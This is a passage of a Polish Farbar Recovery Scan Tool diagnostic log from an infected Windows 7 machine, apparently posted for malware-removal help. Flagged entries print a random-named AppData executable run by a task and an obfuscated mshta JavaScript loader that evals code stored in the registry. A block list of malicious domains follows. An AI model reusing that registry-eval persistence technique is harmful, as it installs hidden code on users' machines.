Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 22-01-2017 Uruchomiony przez Pyko (24-01-2017 12:30:46) Uruchomiony z C:\Users\Pyko\Downloads Windows 7 Ultimate Service Pack 1 (X64) (2009-01-10 15:59:16) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-2811792325-3593454412-1631040856-500 - Administrator - Disabled) Gość (S-1-5-21-2811792325-3593454412-1631040856-501 - Limited - Enabled) HomeGroupUser$ (S-1-5-21-2811792325-3593454412-1631040856-1004 - Limited - Enabled) Pyko (S-1-5-21-2811792325-3593454412-1631040856-1000 - Administrator - Enabled) => C:\Users\Pyko ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Avast Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B} AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Avast Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) µTorrent (HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\uTorrent) (Version: 3.4.9.43085 - BitTorrent Inc.) 2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}) (Version: - Microsoft) 2007 Microsoft Office Suite Service Pack 1 (SP1) (x32 Version: - Microsoft) Hidden ABBYY PDF Transformer+ (HKLM\...\{FA400000-0001-6400-0000-074957833700}) (Version: 4.0.535 - ABBYY Production LLC) AC-3 ACM Codec 2.2 (HKLM-x32\...\AC3ACM) (Version: 2.2 - fccHandler) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 24.0.0.180 - Adobe Systems Incorporated) Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.0.0.400 - Adobe Systems Incorporated) Adobe Flash Player 24 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 24.0.0.194 - Adobe Systems Incorporated) Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.194 - Adobe Systems Incorporated) Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated) Adobe Photoshop CS5 (HKLM-x32\...\{15FEDA5F-141C-4127-8D7E-B962D1742728}) (Version: 12.0 - Adobe Systems Incorporated) Adobe Reader XI (11.0.19) - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AB0000000001}) (Version: 11.0.19 - Adobe Systems Incorporated) AGEIA PhysX v7.09.13 (HKLM-x32\...\{45235788-142C-44BE-8A4D-DDE9A84492E5}) (Version: 7.09.13 - AGEIA Technologies, Inc.) AIMP3 (HKLM-x32\...\AIMP3) (Version: v3.55.1355, 14.07.2014 - AIMP DevTeam) Akamai NetSession Interface (HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\Akamai) (Version: - Akamai Technologies, Inc) ALLPlayer V5.X (HKLM-x32\...\ALLPlayer_is1) (Version: - ALLPlayer Group, Ltd.) AMD Catalyst Install Manager (HKLM\...\{F37078EA-4B6A-1D6F-6FED-3EDF2117B42C}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.) AutoCAD 2014 — Polski (Polish) (Version: 19.1.18.0 - Autodesk) Hidden AutoCAD 2014 Language Pack – Polski (Polish) (Version: 19.1.18.0 - Autodesk) Hidden Autodesk 360 (HKLM\...\{52B28CAD-F49D-47BA-9FFE-29C2E85F0D0B}) (Version: 4.0.27.1 - Autodesk) Autodesk App Manager (HKLM-x32\...\{C070121A-C8C5-4D52-9A7D-D240631BD433}) (Version: 1.1.0 - Autodesk) Autodesk AutoCAD 2014 — Polski (Polish) (HKLM\...\AutoCAD 2014 — Polski (Polish)) (Version: 19.1.18.0 - Autodesk) Autodesk Content Service (HKLM-x32\...\Autodesk Content Service) (Version: 3.1.3.0 - Autodesk) Autodesk Content Service (x32 Version: 3.1.3.0 - Autodesk) Hidden Autodesk Content Service Language Pack (x32 Version: 3.1.3.0 - Autodesk) Hidden Autodesk Featured Apps (HKLM-x32\...\{F732FEDA-7713-4428-934B-EF83B8DD65D0}) (Version: 1.1.0 - Autodesk) Autodesk Material Library 2014 (HKLM-x32\...\{644F9B19-A462-499C-BF4D-300ABC2A28B1}) (Version: 4.0.19.0 - Autodesk) Autodesk Material Library Base Resolution Image Library 2014 (HKLM-x32\...\{51BF3210-B825-4092-8E0D-66D689916E02}) (Version: 4.0.19.0 - Autodesk) Autodesk Material Library Low Resolution Image Library 2014 (HKLM-x32\...\{5C29CC1F-218F-4C30-948A-11066CAC59FB}) (Version: 4.0.19.0 - Autodesk) Autodesk Material Library Medium Resolution Image Library 2014 (HKLM-x32\...\{A0633D4E-5AF2-4E3E-A70A-FE9C2BD8A958}) (Version: 4.0.19.0 - Autodesk) Autodesk ReCap (HKLM\...\Autodesk ReCap) (Version: 1.0.43.13 - Autodesk) Autodesk ReCap (Version: 1.0.43.13 - Autodesk) Hidden Autodesk ReCap Language Pack-English (Version: 1.0.43.13 - Autodesk) Hidden Autodesk Revit 2014 - Polski (Polish) (HKLM\...\Autodesk Revit 2014 - Polski (Polish)) (Version: 13.03.08151 - Autodesk) Autodesk Workflows 2014 (HKLM\...\{11672AB2-3D48-4D38-9123-719E5FF93333}) (Version: 4.0.19.0 - Autodesk, Inc.) Avast Pro Antivirus (HKLM-x32\...\Avast) (Version: 12.3.2280 - AVAST Software) Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: - ) Canon MP Navigator EX 4.0 (HKLM-x32\...\MP Navigator EX 4.0) (Version: - ) Canon Solution Menu EX (HKLM-x32\...\CanonSolutionMenuEX) (Version: - ) CanoScan LiDE 110 Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ2414) (Version: - ) CPUID HWMonitor 1.28 (HKLM\...\CPUID HWMonitor_is1) (Version: - ) DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd) Dodatek Zapisywanie jako PDF firmy Microsoft dla programów pakietu Microsoft Office 2007 (HKLM-x32\...\{90120000-00B0-0415-0000-0000000FF1CE}) (Version: 12.0.4518.1020 - Microsoft Corporation) Draverik Converter 6.5 (HKLM-x32\...\Draverik Converter 6.5) (Version: 6.5 - Draverik) Grand Theft Auto V (HKLM-x32\...\{E01FA564-2094-4833-8F2F-1FFEC6AFCC46}) (Version: "1.00.0000" - Rockstar Games) HL-1110 series (HKLM-x32\...\{4F2442B7-A89E-42A4-8F0E-6937499855CA}) (Version: 1.0.0.0 - Brother Industries, Ltd.) HP LaserJet Professional P1100-P1560-P1600 Series (HKLM\...\HP LaserJet Professional P1100-P1560-P1600 Series) (Version: - ) hppLaserJetService (x32 Version: 001.001.0.0 - Hewlett-Packard) Hidden hppP1100P1560P1600SeriesLaserJetService (x32 Version: 001.001.0.0 - Hewlett-Packard) Hidden hppusgP1100P1560P1600Series (x32 Version: 1.0.0.1 - Hewlett-Packard) Hidden HPSSupply (HKLM-x32\...\{7902E313-FF0F-4493-ACB1-A8147B78DCD0}) (Version: 2.1.1.0000 - Hewlett Packard Development Company L.P.) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation) Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2712 - Intel Corporation) Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.10.255 - Intel Corporation) Java 8 Update 111 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180111F0}) (Version: 8.0.1110.14 - Oracle Corporation) Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation) Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation) Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation) MarketResearch (x32 Version: 130.0.374.000 - Hewlett-Packard) Hidden Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation) Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6215.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.40309 - Microsoft Corporation) Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.) Mozilla Firefox 50.1.0 (x86 pl) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 pl)) (Version: 50.1.0 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0 - Mozilla) Norma Pro (HKLM-x32\...\{6FCEBA1E-B484-4972-883F-E2B99A12758E}) (Version: - ) OCCT 4.4.1 (HKLM-x32\...\OCCT) (Version: 4.4.1 - Ocbase.com) Pakiet językowy programu Revit 2014 - Polski (Polish) (Version: 13.03.08151 - Autodesk) Hidden PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.2 - pdfforge) Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.) Polski pakiet językowy dla narzędzi Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PLK) (Version: 10.0.40309 - Microsoft Corporation) Polski pakiet językowy dla programu Microsoft .NET Framework 4.5 PLK (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1045) (Version: 4.5.50709 - Microsoft Corporation) proCertum CardManager (HKLM-x32\...\{B96A7F3B-AF29-489A-AE84-1DDF5942971C}) (Version: 3.2.0.146 - Certum) Raptr (HKLM-x32\...\Raptr) (Version: - ) Real Alternative 2.0.2 (HKLM-x32\...\RealAlt_is1) (Version: 2.0.2 - ) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.61.612.2012 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7443 - Realtek Semiconductor Corp.) Revit 2014 - Polski (Polish) (Version: 13.03.08151 - Autodesk) Hidden Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.2.1.0 - Rockstar Games) SafeZone Stable 1.51.2220.62 (x32 Version: 1.51.2220.62 - Avast Software) Hidden SketchUp Import for AutoCAD 2014 (HKLM-x32\...\{644E9589-F73A-49A4-AC61-A953B9DE5669}) (Version: 1.1.0 - Autodesk) SlimDrivers (HKLM-x32\...\{A5457401-D56A-43F2-9524-78E54A7FC07A}) (Version: 2.2.32705 - SlimWare Utilities, Inc.) UltraISO Premium V9.65 (HKLM-x32\...\UltraISO_is1) (Version: - ) Video Enhancer 2.1.2 (HKLM-x32\...\Video Enhancer 2_is1) (Version: - Infognition Co. Ltd.) Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{6DA2B636-698A-3294-BF4A-B5E11B238CDD}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation) Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{8CCEA24C-51AE-3B71-9092-7D0C44DDA2DF}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation) Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{C3A57BB3-9AA6-3F6F-9395-6C062BDD5FC4}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation) Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{F6F09DD8-F39B-3A16-ADB9-C9E6B56903F9}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation) Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{04B34E21-5BEE-3D2B-8D3D-E3E80D253F64}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation) Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{14866AAD-1F23-39AC-A62B-7091ED1ADE64}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation) Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{4B90093A-5D9C-3956-8ABB-95848BE6EFAD}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation) Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{B42E259C-E4D4-37F1-A1B2-EB9C4FC5A04D}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation) Volume2 1.1.4 (HKLM-x32\...\Volume2) (Version: 1.1.4 - Alexandr Irza) Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16422 - Microsoft Corporation) WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000_Classes\CLSID\{6A221957-2D85-42A7-8E19-BE33950D1DEB}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe (Autodesk, Inc.) CustomCLSID: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000_Classes\CLSID\{7DE1BE5C-CEBA-4F1D-ACBC-9CE11EE9A2A1}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe (Autodesk, Inc.) CustomCLSID: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000_Classes\CLSID\{BD0DEB94-63DB-4392-9420-6EEE05094B1F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe (Autodesk, Inc.) CustomCLSID: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2014\pl-PL\acadficn.dll (Autodesk, Inc.) CustomCLSID: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000_Classes\CLSID\{E329075A-309E-C247-0518-C475B77AB5B5}\InprocServer32 -> C:\Windows\system32\ole32.dll (Microsoft Corporation) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {00A33173-9C08-4379-9EE6-59D91C6C0F1D} - System32\Tasks\AdobeAAMUpdater-1.0-Pyko-Komputer-Pyko => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated) Task: {13FDC365-B3D7-4468-B07D-96EE067D476A} - System32\Tasks\{CDE74DFA-1D1D-4582-B10A-6646FB56E815} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {18C5B73E-C0E8-41AE-B5F6-7C9E3F5FC279} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-09-09] (AVAST Software) Task: {1EF55738-9CDF-431A-9282-0046587E6EDD} - System32\Tasks\Driver Booster SkipUAC (SYSTEM) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe Task: {21043C87-AA57-49F1-91EA-555B5E2AC52D} - System32\Tasks\{F96A4BC7-6DFE-4320-A4AB-3BAA24B2BC26} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {223DF498-B45D-4AB2-9AEB-09F74382894A} - System32\Tasks\{0F3A4A00-437B-4C9C-AE54-B9C0F5860FA5} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {2934D2DF-067A-4721-ABB6-5D19FE738470} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-06-03] (AVAST Software) Task: {49B0B461-61BA-4EB4-827B-4523AEAD6F40} - System32\Tasks\Uninstaller_SkipUac_Administrator => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe Task: {4A4E636D-0B3A-4B54-8361-987B02748048} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-01-10] (Adobe Systems Incorporated) Task: {4DA0E4C6-058C-44C7-A702-D2D522B0CD1F} - System32\Tasks\{01B3183C-19F7-4DC1-9BD6-D26B5B91E4A1} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {70902E83-1155-4EBE-887F-34FCAE62E2D3} - System32\Tasks\{9ED76EC0-49FC-456D-B1ED-3671CEB47297} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {7315037D-2817-453B-9FAA-DC72EF76749E} - System32\Tasks\avastBCLRestartS-1-5-21-2811792325-3593454412-1631040856-1000 => Firefox.exe Task: {7EB86834-9690-47E9-BE99-62EE0859CE6E} - System32\Tasks\SafeZone scheduled Autoupdate 1448368456 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-09-06] (Avast Software) Task: {80FBF60A-15B0-425F-917B-05F61BF1FA2C} - System32\Tasks\{90E67D96-678C-4540-B848-967B7B3AF9C1} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {8B7A6CA7-91E3-4C53-900F-7DE81C6EC918} - System32\Tasks\{2FBF9F13-0106-49A2-9120-0F99FF7DA707} => pcalua.exe -a C:\Users\Pyko\Downloads\Worms_Armageddon.exe -d C:\Users\Pyko\Downloads Task: {A12DB4C4-1CB0-49D4-8A84-03D1460ADFF7} - System32\Tasks\{91AB74BB-F26C-4341-94E5-59B15245D946} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {A1B20F73-801E-4E07-8B50-CC415741097D} - System32\Tasks\{0E42AF1C-474D-4C11-B6B4-D2CCE833E69E} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {A31A0B15-400C-4C6C-9354-2722C6AF9998} - System32\Tasks\{E24B38E3-801E-45DB-958A-DC76F89BD1CA} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {A47FCC4C-EAA7-4032-8152-BD45D3A582D2} - System32\Tasks\{7A332273-BF2D-4082-9458-60F89CE8D160} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {AADF0814-3171-43E2-93A9-58BACD6BD93B} - System32\Tasks\{6B5A095A-C246-4159-B07D-8FA3258F5DC4} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {AC3B20C0-ADD3-44F7-B1C8-21C629499F6B} - System32\Tasks\{6FD401E1-DD6D-40B8-9DB6-E186AB9A5E2A} => pcalua.exe -a E:\start.exe -d E:\ Task: {C6710140-B3C3-41E2-8616-9E5E62AEDAAA} - System32\Tasks\{4377A4D8-588C-4C27-B160-3D7D31DA18CA} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {E3A1B63F-4D3F-4AE7-9603-F73BB3FC90BA} - System32\Tasks\{DECDCA5B-5BA6-4942-9C52-D5F6DACC5112} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE Task: {FA49406E-B307-4151-8435-F2DA3DE3A9EC} - System32\Tasks\Driver Booster SkipUAC (Pyko) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe Task: {FE19D54A-DC68-4199-B80B-2776B921D5D6} - System32\Tasks\{6AB583B2-634B-4821-B36C-72811BD242D5} => C:\Users\Pyko\Desktop\RM-Win\RM-WIN.EXE (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\HBbRNMacN17uyL5.job => C:\Users\Pyko\AppData\Roaming\HBbRNMacN17uyL5.exe <==== UWAGA ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ==================== Załadowane moduły (filtrowane) ============== 2017-01-20 15:11 - 2017-01-20 15:11 - 04844544 _____ () C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll 2015-04-23 15:54 - 2012-08-21 15:07 - 00288768 _____ () C:\Windows\System32\HP1100LM.DLL 2015-04-23 15:54 - 2012-08-21 15:07 - 00074240 _____ () C:\Windows\system32\spool\PRTPROCS\x64\HP1100PP.DLL 2009-02-22 16:07 - 2012-03-26 17:33 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll 2014-12-02 10:31 - 2010-04-05 20:55 - 00116104 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE 2016-09-09 16:54 - 2016-09-09 16:54 - 00169064 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll 2017-01-24 09:25 - 2017-01-24 09:25 - 04458584 _____ () C:\Program Files\AVAST Software\Avast\defs\17012400\algo.dll 2016-09-09 16:54 - 2016-09-09 16:54 - 00482928 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll 2016-07-22 15:02 - 2016-07-22 15:02 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll 2009-02-22 15:32 - 2000-01-01 01:00 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\ProgramData\TEMP:890CC2F3 [127] AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [148] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\Software\Classes\.scr: AutoCADScriptFile => C:\Windows\system32\notepad.exe "%1" HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\Software\Classes\590818e: "C:\Windows\system32\mshta.exe" "javascript:kZo9vd3="H8Bjlqyl";Av4=new ActiveXObject("WScript.Shell");X9mtDuT="ZJMp";CfUA68=Av4.RegRead("HKCU\\software\\bszlfymfbs\\wtsnpduowt");UdftsN5="AUv";eval(CfUA68);qec99S="n1vQ9W";" <===== UWAGA ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com Wykryto więcej niż wyliczono: 7866 witryn. IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\007guard.com -> install.007guard.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\008k.com -> www.008k.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\00hq.com -> www.00hq.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\010402.com -> 010402.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\0190-dialers.com -> 0190-dialers.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\01i.info -> 01i.info IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\05p.com -> 05p.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com IE restricted site: 